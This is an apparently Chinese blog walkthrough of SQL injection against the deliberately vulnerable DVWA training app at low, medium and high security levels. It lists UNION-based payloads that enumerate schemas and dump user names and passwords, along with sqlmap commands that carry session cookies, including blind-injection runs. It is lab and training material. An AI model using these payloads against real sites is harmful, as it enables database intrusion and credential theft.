新版DVWA-SQL注入测试

  • 安全级别:low

  • 使用手工注入

  • 目标:http://192.168.2.35/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

  • 1' or '1' ='1

  • 1' or 1 = 1 #

  • 1' or 1 = 1 -- 这个--后面有个空格

  • 上面只是测试SQL注入是否存在

  • 手工SQL注入各种操作

  • 爆出所有数据库

  • 1' and 1=2 union select 1,schema_name from information_schema.schemata --

  • 爆出所有的表名

  • 1' and 1=2 union select table_schema,table_name from information_schema.tables --

  • 爆数据库当前在使用的数据库名

  • 1' and 1=2 union select 1,group_concat(schema_name) from information_schema.schemata --

  • 数据库用户信息和版本号

  • 1' and 1=2 union select 1,concat(database(),0x3a,user(),0x3a,version()) from information_schema.schemata --

  • 爆表

  • 1' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --

  • 爆字段

  • 1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273
    and table_schema=database() --

  • 爆出全部内容

  • 1' and 1=2 union select 1,group_concat(user_id,0x3a,user,0x3a,password) from users --

  • 一个一个爆

  • 1' and 1=2 union select 1,concat(user) from users limit 0,1 --

  • 爆出账户和密码

  • 1' and 1=2 union select concat(user),concat(password) from users limit 0,1 --

  • 使用sqlmap注入

  • 判断是否存在注入

  • sqlmap -u "http://192.168.2.35/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --proxy=http://127.0.0.1:8090 --cookie "security=low; PHPSESSID=rhd6bcm0gu3hq0evsdde6t7fj0"

  • 列出所有数据库

  • sqlmap -u "http://192.168.2.35/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --proxy=http://127.0.0.1:8090 --cookie "security=low; PHPSESSID=rhd6bcm0gu3hq0evsdde6t7fj0" --dbs

  • 直接爆出账户和密码

  • sqlmap -u "http://192.168.2.35/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --proxy=http://127.0.0.1:8090 --cookie "security=low; PHPSESSID=rhd6bcm0gu3hq0evsdde6t7fj0" --users --passwords

  • 注意这里因为DVWA是登录状态,所以注入的时候需要带上cookie,这里的cookie值是cookie属性不需要带上cookie的key和value


  • 安全级别:medium

  • 使用手工注入

  • 这个中级别就是变成了POST请,只要使用Burpsuite或者OWASP ZAP 抓包提交POST的BODY体 数据即可

  • 在body体中提交如下数据

  • id=1 union select 1, version() limit 1,1 &Submit=Submit

  • 其他跟低级别的类似

  • 爆出所有数据库

  • id=1 union select 1,schema_name from information_schema.schemata -- &Submit=Submit

  • 爆出所有表名

  • id=1 union select table_schema,table_name from information_schema.tables -- &Submit=Submit

  • 爆出当前在使用的数据库名

  • id=1 union select 1,group_concat(schema_name) from information_schema.schemata -- &Submit=Submit

  • 爆出用户信息和版本号

  • id=1 union select 1,concat(database(),0x3a,user(),0x3a,version()) from information_schema.schemata -- &Submit=Submit

  • 爆表

  • id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() -- &Submit=Submit

  • 爆字段

  • id=1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 and table_schema=database() -- &Submit=Submit

  • 爆出全部内容

  • id=1 union select 1,group_concat(user_id,0x3a,user,0x3a,password) from users -- &Submit=Submit

  • 一个一个爆

  • id=1 union select 1,concat(user) from users limit 0,1 &Submit=Submit

  • 爆出账户和密码

  • id=1 union select concat(user),concat(password) from users limit 0,1 -- &Submit=Submit

  • 使用sqlmap注入

  • 测试是否存在注入

  • sqlmap -u "http://192.168.2.35/dvwa/vulnerabilities/sqli/#" --data "id=2&Submit=Submit" --proxy=http://127.0.0.1:8090 --cookie "security=medium; PHPSESSID=rhd6bcm0gu3hq0evsdde6t7fj0"

  • 列出所有的数据库

  • sqlmap -u "http://192.168.2.35/dvwa/vulnerabilities/sqli/#" --data "id=2&Submit=Submit" --proxy=http://127.0.0.1:8090 --cookie "security=medium; PHPSESSID=rhd6bcm0gu3hq0evsdde6t7fj0" --dbs

  • 其他操作都一样


  • SQL盲注

  • 安全级别:低
    sqlmap -u "http://192.168.2.35/dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit#" --proxy=http://127.0.0.1:8090 --cookie "security=low; PHPSESSID=rhd6bcm0gu3hq0evsdde6t7fj0"

  • SQL盲注

  • 安全级别:中
    sqlmap -u "http://192.168.2.35/dvwa/vulnerabilities/sqli_blind/#" --data="id=3&Submit=Submit" --proxy=http://127.0.0.1:8090 --cookie "security=medium; PHPSESSID=rhd6bcm0gu3hq0evsdde6t7fj0"

  • SQL盲注

  • 安全级别:高
    sqlmap -u "http://192.168.2.35/dvwa/vulnerabilities/sqli_blind/cookie-input.php" --data="id=5&Submit=Submit" --proxy=http://127.0.0.1:8090 --cookie="security=high; PHPSESSID=rhd6bcm0gu3hq0evsdde6t7fj0" -p id --level=5 --risk=3

  • 免责申明:本人所撰写的文章,仅供学习和研究使用,请勿使用文中的技术或源码用于非法用途,任何人造成的任何负面影响,或触犯法律,与本人无关

你可能感兴趣的:(新版DVWA-SQL注入测试)